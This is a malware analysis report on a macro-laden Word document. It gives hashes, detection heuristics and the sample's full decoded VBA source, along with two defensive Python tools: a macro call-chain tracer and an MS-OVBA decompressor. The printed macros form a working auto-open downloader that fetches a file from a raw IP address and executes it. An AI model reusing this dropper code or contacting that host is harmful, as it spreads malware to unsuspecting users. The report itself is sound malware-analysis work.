Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0da22c99de217f2c…

MALICIOUS

Office (OOXML)

Size: 173.0 KB
Created: 2019-04-18 08:25:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-11-20
MD5: ee449bcdea0224688b269b19ff992803
SHA-1: dd86a78fd2dfe103d2d4bb1802e88fa362f4bdce
SHA-256: 0da22c99de217f2cf99363bcf2cc53aedb53919bc349bf019bd77d20cba47ec1
Risk score: 150

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample contains VBA macros that run as soon as the document is opened: ThisDocument.Document_Open fires and calls Jkweuf, which (via Hiejnr) shows the UserForm GgopFrm. The form's UserForm_Initialize handler hands two control values, NMV1.Text and NMV2.Text, to Mnuejwr. That routine first calls Ioweimwe, which invokes the declared urlmon!URLDownloadToFileA to fetch http://108.174.199.10/wordupd3.tmp (NMV2) to a local path (NMV1), and then calls Vberw, which runs Shell() on that same path. The downloaded file is therefore executed, likely leading to further malicious activity. Note that neither the URL nor the drop path appears as a literal in the macro text: both are design-time values of the form's controls, stored in the form storage of vbaProject.bin, so string scanning of the VBA source alone misses them.
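The chain above can be checked mechanically rather than by eye. The Python below is an added example written for this page; it is not the report's analysis tooling and not the sample's code. It parses olevba-style decoded VBA, builds a call graph across modules, adds the implicit edge from Form.Show to that form's UserForm_Initialize, resolves Declare aliases to the real export name, and lists every path from an auto-execute entry point to a sink. The entry-point and sink lists are the example's own assumptions, and the input is a condensed copy of the macros.bas artifact extracted further down (multi-line If blocks written as single-line Ifs; attribute lines, the #If VBA7 branch and the empty NMV2_Change handler dropped).

```python
import re

# Added example for this report (not the analysis tooling, not the sample's code):
# a static call-chain tracer over decoded VBA source in olevba's .bas layout.
# Assumption: these entry points and sinks suffice for this sample; real triage
# uses the much longer lists that tools such as olevba maintain.
ENTRY_POINTS = ("Document_Open", "AutoOpen", "Workbook_Open", "Auto_Open")
BUILTIN_SINKS = ("Shell", "CreateObject", "GetObject")

MODULE_RE = re.compile(r'^Attribute VB_Name = "([^"]+)"', re.M)
PROC_RE = re.compile(r'^[ \t]*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)'
                     r'\s+(\w+)\b(.*?)^[ \t]*End (?:Sub|Function)', re.M | re.S)
DECLARE_RE = re.compile(r'^[ \t]*(?:(?:Private|Public)\s+)?Declare\s+(?:PtrSafe\s+)?'
                        r'(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?', re.M)
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')
SHOW_RE = re.compile(r'\b(\w+)\.Show\b')
CONTROL_RE = re.compile(r'\b(\w+)\.(Text|Caption|Value|Tag)\b')


def parse_modules(src):
    """Split a concatenated olevba dump into {module name: module text}."""
    src = re.sub(r'[ \t]+_\r?\n[ \t]*', ' ', src)      # join VBA line continuations
    parts = MODULE_RE.split(src)                     # [prefix, name1, text1, name2, ...]
    return {parts[i]: parts[i + 1] for i in range(1, len(parts), 2)}


def build_graph(src):
    """Return ({'Module.Proc': body}, {'Module.Proc': [callee nodes]}); callee nodes are
    other procedures, declared imports ('API:lib!export') or built-ins ('SINK:name')."""
    declared, procs, by_name = {}, {}, {}
    for mod, text in parse_modules(src).items():
        for name, lib, alias in DECLARE_RE.findall(text):
            declared[name] = f"{lib}!{alias or name}"   # local name -> real export name
        for name, body in PROC_RE.findall(text):
            procs[f"{mod}.{name}"] = body
            by_name.setdefault(name, []).append(f"{mod}.{name}")
    edges = {}
    for q, body in procs.items():
        targets = []
        for ident in dict.fromkeys(IDENT_RE.findall(body)):   # first-seen order, no dups
            if ident in by_name:
                targets += by_name[ident]                       # VBA calls are unqualified
            elif ident in declared:
                targets.append("API:" + declared[ident])
            elif ident in BUILTIN_SINKS:
                targets.append("SINK:" + ident)
        for form in SHOW_RE.findall(body):
            # Form.Show instantiates the form, so its UserForm_Initialize runs: an implicit
            # edge that a plain search for procedure names never shows.
            if f"{form}.UserForm_Initialize" in procs:
                targets.append(f"{form}.UserForm_Initialize")
        edges[q] = targets
    return procs, edges


def trace_sinks(src):
    """Every path from an auto-execute entry point to a sink, as lists of node names."""
    procs, edges = build_graph(src)
    paths = []

    def walk(node, path):
        path = path + [node]
        if node.startswith(("API:", "SINK:")):
            paths.append(path)
            return
        for nxt in edges.get(node, []):
            if nxt not in path:             # guard against recursive procedures
                walk(nxt, path)

    for q in procs:
        if q.split(".", 1)[1] in ENTRY_POINTS:
            walk(q, [])
    return paths


def control_inputs(src):
    """Form-control properties the code reads; their design-time values sit in the form
    storage of vbaProject.bin, not in the macro text, so string scans of source miss them."""
    procs, _ = build_graph(src)
    return sorted({f"{q.split('.')[0]}.{c}.{p}"
                   for q, body in procs.items() for c, p in CONTROL_RE.findall(body)})


# Condensed copy of the macros.bas artifact from this report (single-line Ifs; attribute
# lines, the #If VBA7 branch and the empty NMV2_Change handler omitted).
SAMPLE_SRC = '''\
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Jkweuf
End Sub
Attribute VB_Name = "Mod1"
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
        ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub Jkweuf()
    If IsArray(Array(1, 2, 3)) = True Then Hiejnr
End Sub
Sub Vberw(vbf)
    If IsNull(123) = False Then Shell vbf
End Sub
Attribute VB_Name = "GgopFrm"
Private Sub UserForm_Initialize()
    Mnuejwr NMV1.Text, Array(1, 2, 3, 4), NMV2.Text
End Sub
Function Mnuejwr(uenjk66, bdjwj77, irweh88)
    If IsArray(bdjwj77) = True Then Ioweimwe uenjk66, irweh88
    Jnej = Len("ytrfg")
    If Jnej = 5 Then Vberw uenjk66
End Function
Attribute VB_Name = "Mod2"
Function Hiejnr()
    GgopFrm.Show
End Function
Attribute VB_Name = "Mod3"
Sub Ioweimwe(mejnw33, mien55)
    If Len(mejnw33) <> Len(mien55) Then URLDownloadToFile 0, mien55, mejnw33, 0, 0
End Sub
'''

if __name__ == "__main__":
    for path in trace_sinks(SAMPLE_SRC):
        print(" -> ".join(path))
    print("inputs from form controls:", ", ".join(control_inputs(SAMPLE_SRC)))
```

Run stand-alone it prints two paths, one ending in API:urlmon!URLDownloadToFileA and one in SINK:Shell, both passing through GgopFrm.UserForm_Initialize, plus the two form controls (GgopFrm.NMV1.Text, GgopFrm.NMV2.Text) whose values the code consumes without ever assigning them. That last point is the practical caveat: the URL and the drop path have to be recovered from the form streams inside vbaProject.bin (olevba does this in its form-string extraction), not from macros.bas.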

Heuristics (5)

  • VBA project inside OOXML (medium; rule OOXML_VBA; 3 related findings)
    Document contains a VBA project (VBA macros present).
  • Potential Shell call in VBA (critical; rule OLE_VBA_SHELL)
    Matched lines in script:
        If IsNull(123) = False Then
            Shell vbf
        End If
  • URLDownloadToFile in VBA (critical; rule OLE_VBA_DOWNLOAD)
    Matched lines in script:
        #If VBA7 Then
        Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
                Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • Document_Open macro (low; rule OLE_VBA_DOCOPEN)
    Matched lines in script:
        Attribute VB_Customizable = True
        Private Sub Document_Open()
            Jkweuf
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URL: http://108.174.199.10/wordupd3.tmp (referenced by macro; the download source used by the macro chain)
    Other URLs, all labelled "referenced by macro" (these are OOXML, XMP and RDF namespace identifiers, not network indicators):
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/officeDocument/2006/math
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main
      • http://schemas.microsoft.com/office/word/2006/wordml
      • http://www.iec.ch
      • http://ns.adobe.com/xap/1.0/
      • http://www.w3.org/1999/02/22-rdf-syntax-ns#
      • http://purl.org/dc/elements/1.1/
      • http://ns.adobe.com/xap/1.0/mm/
      • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
      • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
      • http://ns.adobe.com/photoshop/1.0/

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2151 bytes
SHA-256: 074b375a6809604d1815b723de1d54bf03002c76150152576f420c5c10d61f18
Script preview (full decoded source; the report viewer caps previews at 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Jkweuf
End Sub

Attribute VB_Name = "Mod1"

#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Sub Jkweuf()
    If IsArray(Array(1, 2, 3)) = True Then
        Hiejnr
    End If
End Sub

Sub Vberw(vbf)
    If IsNull(123) = False Then
        Shell vbf
    End If
End Sub

Attribute VB_Name = "GgopFrm"
Attribute VB_Base = "0{A16B031A-1B86-4013-84A4-B327722C7503}{D7903844-21A4-46E8-9E3A-798A49B0E2AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub NMV2_Change()

End Sub

Private Sub UserForm_Initialize()
    Mnuejwr NMV1.Text, Array(1, 2, 3, 4), NMV2.Text
End Sub

Function Mnuejwr(uenjk66, bdjwj77, irweh88)
    If IsArray(bdjwj77) = True Then
        Ioweimwe uenjk66, irweh88
    End If

    Jnej = Len("ytrfg")
    If Jnej = 5 Then
        Vberw uenjk66
    End If
End Function




Attribute VB_Name = "Mod2"
Function Hiejnr()
    GgopFrm.Show
End Function

Attribute VB_Name = "Mod3"
Sub Ioweimwe(mejnw33, mien55)
    If Len(mejnw33) <> Len(mien55) Then
        URLDownloadToFile 0, mien55, mejnw33, 0, 0
    End If
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 20992 bytes
SHA-256: f886509d9808482a320d3424f4ffcd7c4b3838c4170d0dfca922fdd18556a9e6
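What "decoded VBA source" in the macros.bas row means: inside vbaProject.bin every module's source text is stored as an MS-OVBA CompressedContainer, and olevba's extract_macros locates each container through the dir stream and decompresses it. The codec below is an added example written for this page, not oletools code. decompress_container implements the container format from MS-OVBA section 2.4.1; compress_literal_only is a deliberately naive but valid encoder that never emits copy tokens, so round-tripping through it exercises the decoder's chunk and token parsing. Locating a container (the dir stream's per-module offset records) is not part of the example, so it cannot be pointed at vbaProject_00.bin as-is; the hand-built FIXTURE and the round-trip inputs are the example's own constructed data.

```python
"""MS-OVBA CompressedContainer codec (added example for this report, not oletools code).

Layout: a 0x01 signature byte, then chunks of at most 4096 decompressed bytes. Each
chunk is a 2-byte little-endian header (bits 0-11: chunk size minus 3, bits 12-14: the
fixed value 0b011, bit 15: 1 = token data, 0 = 4096 raw bytes) followed by its data.
Token data is a sequence of flag bytes, each governing eight tokens: flag bit 0 means a
one-byte literal, flag bit 1 means a 16-bit LZ77 copy token (offset, length).
"""


def decompress_container(data: bytes) -> bytes:
    if not data or data[0] != 0x01:
        raise ValueError("missing CompressedContainer signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3          # header bytes are included in the size
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError(f"bad chunk signature at offset {pos}")
        compressed = bool(header & 0x8000)
        chunk = data[pos + 2:pos + chunk_size]
        pos += chunk_size
        chunk_start = len(out)
        if not compressed:                           # raw chunk: bytes copied verbatim
            out += chunk[:4096]
            continue
        i = 0
        while i < len(chunk) and len(out) - chunk_start < 4096:
            flags = chunk[i]
            i += 1
            for bit in range(8):
                if i >= len(chunk) or len(out) - chunk_start >= 4096:
                    break
                if not (flags >> bit) & 1:           # literal token: one byte
                    out.append(chunk[i])
                    i += 1
                    continue
                token = int.from_bytes(chunk[i:i + 2], "little")
                i += 2
                # Copy token: how many of the 16 bits hold the offset depends on how much
                # of this chunk is already decompressed (the spec's CopyToken Help rule).
                decompressed = len(out) - chunk_start
                bit_count = max((decompressed - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > decompressed:
                    raise ValueError(f"copy token reaches before chunk start near {pos}")
                for _ in range(length):              # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def compress_literal_only(raw: bytes, chunk_bytes: int = 3640) -> bytes:
    """Valid but naive encoder: every input byte becomes a literal token, so the output
    is larger than the input. 3640 input bytes per chunk keeps 455 flag bytes + 3640
    literals + the 2-byte header under the 4098-byte chunk size limit. Real writers emit
    copy tokens and fall back to raw chunks when compression would not pay off."""
    out = bytearray(b"\x01")
    for start in range(0, len(raw), chunk_bytes):
        body = bytearray()
        part = raw[start:start + chunk_bytes]
        for i in range(0, len(part), 8):
            body.append(0x00)                        # flag byte: all eight tokens literal
            body += part[i:i + 8]
        header = ((len(body) + 2 - 3) & 0x0FFF) | (0b011 << 12) | 0x8000
        out += header.to_bytes(2, "little") + body
    return bytes(out)


# Hand-built container (constructed fixture) for b"abcabcabc": three literal tokens,
# then one copy token (offset 3, length 6) that overlaps its own output.
FIXTURE = bytes.fromhex("01 05b0 08 616263 0320")

if __name__ == "__main__":
    print(decompress_container(FIXTURE))
    src = b'Attribute VB_Name = "Mod1"\r\nSub Jkweuf()\r\n    Hiejnr\r\nEnd Sub\r\n'
    print(decompress_container(compress_literal_only(src)) == src)
```

Two practitioner notes. First, a wrong start offset produces either a signature error or plausible-looking garbage, so when a carved module looks corrupt, recheck the offset from the dir stream before blaming the decoder. Second, decompressed source text is what Office shows in the editor, not necessarily what it runs: when the compiled p-code matches the host version it executes instead, so source that looks too clean for the observed behaviour should be compared against a p-code disassembly.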